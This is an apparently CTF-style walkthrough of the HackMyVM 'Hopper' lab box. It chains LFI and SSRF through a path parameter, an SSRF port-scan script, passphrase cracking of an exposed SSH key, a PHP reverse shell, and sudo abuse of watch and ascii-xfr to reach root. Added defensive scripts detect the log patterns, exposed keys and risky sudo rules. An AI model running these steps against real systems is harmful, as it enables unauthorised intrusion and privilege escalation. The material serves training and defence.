HackMyVm Hopper Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Hopper
Scan ports.
```bash
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
Nmap scan report for bogon (192.168.56.100)
Host is up (0.00079s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
| 256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
|_ 256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Enumerate port 80.
```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.z -b 403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 80]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]
```
Check /advanced-search: enter anything and click "Submit", and notice the URL becomes "http://192.168.56.100/advanced-search/path.php?path=xxx", so the `path` parameter names a resource the server fetches. Fuzz it for LFI.
```bash
~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0 -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000005: 200 227 L 1115 W 7224 Ch "/etc/apache2/apache2.conf"
000000001: 200 27 L 39 W 1439 Ch "/etc/passwd"
000000018: 200 12 L 88 W 664 Ch "/etc/fstab"
...
000000188: 200 0 L 1 W 32064 Ch "/var/log/faillog"
000000224: 200 1 L 4 W 1151 Ch "/var/run/utmp"
000000220: 200 34 L 237 W 164321 Ch "/var/log/wtmp"
000000199: 200 0 L 1 W 292584 Ch "/var/log/lastlog"
```
Get the usernames from /etc/passwd.
```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash
```
Since `path` also accepts URLs, write a Python script that enumerates local ports through it (the server fetches http://127.0.0.1:PORT and returns the response body, so a non-empty body means something answered).
```python
#!/usr/bin/python3
# Loop over every TCP port; the server fetches http://127.0.0.1:<port> on our
# behalf, and an empty response body means nothing answered on that port.
import requests

for port in range(1, 65536):
    res = requests.get(f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}')
    if len(res.text) == 0:
        continue
    print(f'port {port} is open.')
```
Port 2222 is open.
```bash
~ python3 enum.py
port 22 is open.
port 80 is open.
port 2222 is open.
```
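From the defender's side, the two requests above (file:// reads through `path=` and a loop over http://127.0.0.1:PORT) leave an obvious trail in the Apache access log. The following Python script is an added example, not part of the original walkthrough: it parses combined-format log lines, flags file:// or absolute-path values in the `path` parameter as LFI, flags http(s) values that point at loopback or private hosts as SSRF, and reports a client that touches many distinct loopback ports as a port scan. The log lines, the `path` parameter name and the scan threshold are constructed assumptions for this example.

```python
#!/usr/bin/env python3
"""Added example (not part of the original walkthrough): flag abuse of a
resource-fetching parameter such as /advanced-search/path.php?path=... in an
Apache combined-format access log.  Reported patterns:
  * file:// scheme, absolute path or ../ traversal  -> "lfi"
  * http(s)/ftp/gopher/dict to loopback/private host -> "ssrf-internal"
  * many distinct loopback ports from one client     -> "ssrf-portscan"
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WATCHED_PARAMS = ("path",)      # assumption: the parameter(s) the app uses to fetch a resource
SCAN_THRESHOLD = 5              # assumption: distinct loopback ports from one client = scan
# Rough match for loopback, link-local and RFC1918 hosts (tighten for your own network).
INTERNAL_HOST_RE = re.compile(
    r'^(127\.\d+\.\d+\.\d+|localhost|0\.0\.0\.0|::1|10\.\d+\.\d+\.\d+|'
    r'192\.168\.\d+\.\d+|172\.(1[6-9]|2\d|3[01])\.\d+\.\d+|169\.254\.\d+\.\d+)$'
)


def classify(value):
    """Return a finding label for one fetched-resource value, or None if it looks benign."""
    v = unquote(value)
    parts = urlsplit(v)
    if parts.scheme == "file" or v.startswith("/") or v.startswith(".."):
        return "lfi"
    if parts.scheme in ("http", "https", "ftp", "gopher", "dict"):
        if INTERNAL_HOST_RE.match(parts.hostname or ""):
            return "ssrf-internal"
    return None


def extract_values(target):
    """Yield the values of every watched parameter in a request target."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name in WATCHED_PARAMS:
        for v in qs.get(name, []):
            yield v


def detect(lines):
    """Return [(client_ip, label, detail)] for every suspicious request in `lines`."""
    findings = []
    ports_by_ip = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m["ip"], m["target"]
        for v in extract_values(target):
            label = classify(v)
            if not label:
                continue
            findings.append((ip, label, unquote(v)))
            if label == "ssrf-internal":
                try:
                    port = urlsplit(unquote(v)).port
                except ValueError:
                    port = None
                if port:
                    ports_by_ip[ip].add(port)
    for ip, ports in ports_by_ip.items():
        if len(ports) >= SCAN_THRESHOLD:
            findings.append((ip, "ssrf-portscan", f"{len(ports)} distinct loopback ports"))
    return findings


# Constructed sample log: one LFI read, one benign search, one SSRF probe, then a port sweep.
_SCAN_PORTS = (21, 22, 23, 25, 80, 443)
SAMPLE_LOG = [
    '192.168.56.1 - - [30/Aug/2021:11:40:01 +0800] "GET /advanced-search/path.php?path=file:///etc/passwd HTTP/1.1" 200 1439 "-" "curl/7.74.0"',
    '192.168.56.1 - - [30/Aug/2021:11:40:02 +0800] "GET /advanced-search/path.php?path=hopper HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.168.56.1 - - [30/Aug/2021:11:41:00 +0800] "GET /advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222 HTTP/1.1" 200 181 "-" "curl/7.74.0"',
] + [
    f'192.168.56.1 - - [30/Aug/2021:11:41:{10 + i:02d} +0800] "GET /advanced-search/path.php?path=http://127.0.0.1:{p} HTTP/1.1" 200 0 "-" "python-requests/2.25.1"'
    for i, p in enumerate(_SCAN_PORTS)
]

if __name__ == "__main__":
    for ip, label, detail in detect(SAMPLE_LOG):
        print(f"{ip:15} {label:14} {detail}")
```

Point it at a real log by replacing SAMPLE_LOG with the lines of /var/log/apache2/access.log. On the application side the fix is to stop handing user input to a URL-capable fetch at all: resolve `path` against an allowlist of local files and reject anything with a scheme.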
Check port 2222.
```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'
<!DOCTYPE html>
<html>
<body>
<h1>[+] WARNING</h1>
<p> - Private corporative web server</p>
<p> - If you are non organization personal, leave immediately</p>
</body>
</html>
```
Fuzz the directories of port 2222 through the same parameter.
```bash
~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222' -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b 401,403,404,500 --wildcard --exclude-length 181
/backup (Status: 200) [Size: 1751]
...
```
An id_rsa private key is served at /backup. Save it, `chmod 600` it, and brute-force its passphrase.
```bash
~ /usr/share/john/ssh2john.py id_rsa > hash.txt
& kali @ mykali in ~/Documents/hopper 0 [13:03:29]
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt ...
barcelona (id_rsa)
```
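The key under /backup is the real finding here: a private key served from a web root is a credential leak whether or not its passphrase survives a wordlist. The script below is an added example (not from the walkthrough) that walks a web root and reports every SSH private key it finds, recording whether the key is passphrase-protected: for OpenSSH-format keys it reads the cipher name out of the key header ("none" means unencrypted), for legacy PEM keys it looks for the `Proc-Type: 4,ENCRYPTED` line. The temporary web root and both key files are constructed here; only the header of each OpenSSH blob is built, which is all the check reads.

```python
#!/usr/bin/env python3
"""Added example (not part of the original walkthrough): find SSH private
keys exposed under a web root and report whether each one has a passphrase."""
import base64
import os
import struct
import tempfile

PEM_HEADER = b"-----BEGIN "
OPENSSH_MAGIC = b"openssh-key-v1\x00"   # first bytes of the decoded OpenSSH key format


def openssh_cipher(body_b64):
    """Return the cipher name stored in an OpenSSH-format key blob, or None if not that format.

    Layout after the magic: uint32 length, then the cipher name ('none' = no passphrase)."""
    body_b64 = body_b64[: len(body_b64) - len(body_b64) % 4]   # tolerate a truncated read
    raw = base64.b64decode(body_b64)
    if not raw.startswith(OPENSSH_MAGIC):
        return None
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", raw[off:off + 4])
    return raw[off + 4:off + 4 + n].decode("ascii", "replace")


def inspect_key(data):
    """Return (key_type, encrypted) if `data` is a private key file, else None."""
    first = data.split(b"\n", 1)[0].strip()
    if not (first.startswith(PEM_HEADER) and b"PRIVATE KEY" in first):
        return None
    key_type = first[len(PEM_HEADER):].rstrip(b"-").strip().decode()
    lines = [ln.strip() for ln in data.splitlines()]
    if key_type == "OPENSSH PRIVATE KEY":
        body = b"".join(ln for ln in lines[1:] if not ln.startswith(b"-----"))
        cipher = openssh_cipher(body)
        return key_type, (cipher is not None and cipher != "none")
    # Legacy PEM (RSA/DSA/EC): encryption is announced by a Proc-Type header near the top.
    encrypted = any(ln.startswith(b"Proc-Type: 4,ENCRYPTED") for ln in lines[1:4])
    return key_type, encrypted


def find_private_keys(root):
    """Return sorted [(relative_path, key_type, encrypted)] for every private key under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(65536)
            except OSError:
                continue
            info = inspect_key(head)
            if info:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                hits.append((rel, info[0], info[1]))
    return sorted(hits)


def make_openssh_blob(cipher):
    """Constructed sample: just enough of an OpenSSH key header to carry the cipher field."""
    raw = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher.encode() + b"\x00" * 16
    b64 = base64.b64encode(raw).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 +
            "\n-----END OPENSSH PRIVATE KEY-----\n").encode()


def build_sample_webroot():
    """Constructed web root: a backup/ directory with two keys plus an unrelated HTML page."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "backup"))
    with open(os.path.join(root, "backup", "id_rsa"), "wb") as fh:
        fh.write(make_openssh_blob("aes256-ctr"))    # passphrase-protected
    with open(os.path.join(root, "backup", "id_ed25519.old"), "wb") as fh:
        fh.write(make_openssh_blob("none"))          # no passphrase at all
    with open(os.path.join(root, "index.html"), "wb") as fh:
        fh.write(b"<html><body>Private corporative web server</body></html>\n")
    return root


if __name__ == "__main__":
    for rel, key_type, enc in find_private_keys(build_sample_webroot()):
        print(f"{rel}: {key_type}, {'passphrase-protected' if enc else 'NO PASSPHRASE'}")
```

Run it against /var/www/html (or any directory a web server exposes) as a pre-deployment check; either result is a finding, since the passphrase only buys time against an offline wordlist attack like the john run above.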
Log in over SSH as edward with the cracked key.
```bash
~ ssh edward@192.168.56.100 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/edward/.Xauthority does not exist
edward@hopper:~$ id
uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
```
Upload a PHP reverse shell to the web root as r.php, start a listener, and request it to get a shell as www-data.
```bash
~ curl http://192.168.56.100/r.php
& kali @ mykali in ~/Documents/hopper 0 [13:07:35]
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:35698.
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
07:07:50 up 1:41, 0 users, load average: 0.01, 0.02, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Check sudo -l.
```bash
www-data@hopper:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on hopper:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on hopper:
(henry) NOPASSWD: /usr/bin/watch
```
Set the TERM environment variable (watch is a curses program and refuses to start without a usable terminal), then use the sudo rule on watch to escalate to user henry.
```bash
www-data@hopper:/$ export TERM=xterm-256color
export TERM=xterm-256color
www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
$ id
id
uid=1001(henry) gid=1001(henry) groups=1001(henry)
```
Upload id_rsa.pub to /home/henry/.ssh/, rename it to authorized_keys, and log in over SSH as henry.
```bash
~ ssh henry@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /home/henry/.Xauthority does not exist
henry@hopper:~$ id
uid=1001(henry) gid=1001(henry) grupos=1001(henry)
```
Check sudo -l.
```bash
henry@hopper:~$ sudo -l
Matching Defaults entries for henry on hopper:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User henry may run the following commands on hopper:
(root) NOPASSWD: /usr/bin/ascii-xfr
```
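Both sudo rules on this box (www-data to henry via watch, henry to root via ascii-xfr) are the kind of entry a hardening review should catch before anyone chains them. The script below is an added example, not part of the walkthrough: it parses `sudo -l` output in the format shown above and flags rules whose target binary can run an arbitrary command or write to a caller-chosen path, rating NOPASSWD rules that run as root highest. The seed list of risky binaries is an assumption holding only the two this page shows, to be extended from your own review; the `sudo -l` samples embed the page's output plus one constructed benign rule.

```python
#!/usr/bin/env python3
"""Added example (not part of the original walkthrough): audit `sudo -l` output
for rules that hand out more privilege than intended."""
import re

# Assumption: seed list built from the two binaries on this page; extend it from your own review.
RISKY_BINARIES = {
    "watch": "runs an arbitrary command (-x) under a caller-controlled TERM",
    "ascii-xfr": "writes (-r) data from stdin to any path named on the command line",
}

# "(runas) TAG: TAG: /path/cmd args, /path/other" as printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return [(runas, {tags}, [commands])] for every rule below the 'may run' line."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m["tags"].split() if t.strip()}
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        rules.append((m["runas"].strip(), tags, cmds))
    return rules


def audit(text):
    """Return [(runas, command, severity, reason)] for rules worth questioning."""
    findings = []
    for runas, tags, cmds in parse_sudo_l(text):
        for cmd in cmds:
            exe = cmd.split()[0]
            name = exe.rsplit("/", 1)[-1]
            reasons = []
            if name in RISKY_BINARIES:
                reasons.append(RISKY_BINARIES[name])
            if cmd == "ALL":
                reasons.append("unrestricted command")
            if not reasons:
                continue
            # NOPASSWD straight to root (or ALL) is the worst case; a hop to another user is still a finding.
            severity = "high" if ("NOPASSWD" in tags and runas in ("root", "ALL")) else "medium"
            findings.append((runas, cmd, severity, "; ".join(reasons)))
    return findings


# `sudo -l` output as shown on the page for www-data.
SAMPLE_WWW = r"""Matching Defaults entries for www-data on hopper:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on hopper:
    (henry) NOPASSWD: /usr/bin/watch
"""

# `sudo -l` output as shown on the page for henry, plus one constructed benign rule.
SAMPLE_HENRY = r"""Matching Defaults entries for henry on hopper:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on hopper:
    (root) NOPASSWD: /usr/bin/ascii-xfr
    (root) /usr/bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for sample in (SAMPLE_WWW, SAMPLE_HENRY):
        for runas, cmd, severity, reason in audit(sample):
            print(f"[{severity}] ({runas}) {cmd}: {reason}")
```

The remediation the findings point at is the usual one: drop NOPASSWD where a password prompt is acceptable, and when a rule is genuinely needed pin it to the exact arguments (`/usr/bin/systemctl restart apache2`, not `/usr/bin/systemctl`) so the binary's other modes are not reachable.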
Use ascii-xfr (which sudo lets henry run as root) in receive mode to write henry's authorized_keys into /root/.ssh/authorized_keys.
```bash
henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys
ASCII download of "/root/.ssh/authorized_keys"

0.6 Kbytes transferred at 565 CPS... Done.
```
Log in as root.
```bash
~ ssh root@192.168.56.100
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
/usr/bin/xauth: file /root/.Xauthority does not exist
root@hopper:~# id;hostname
uid=0(root) gid=0(root) grupos=0(root)
hopper
```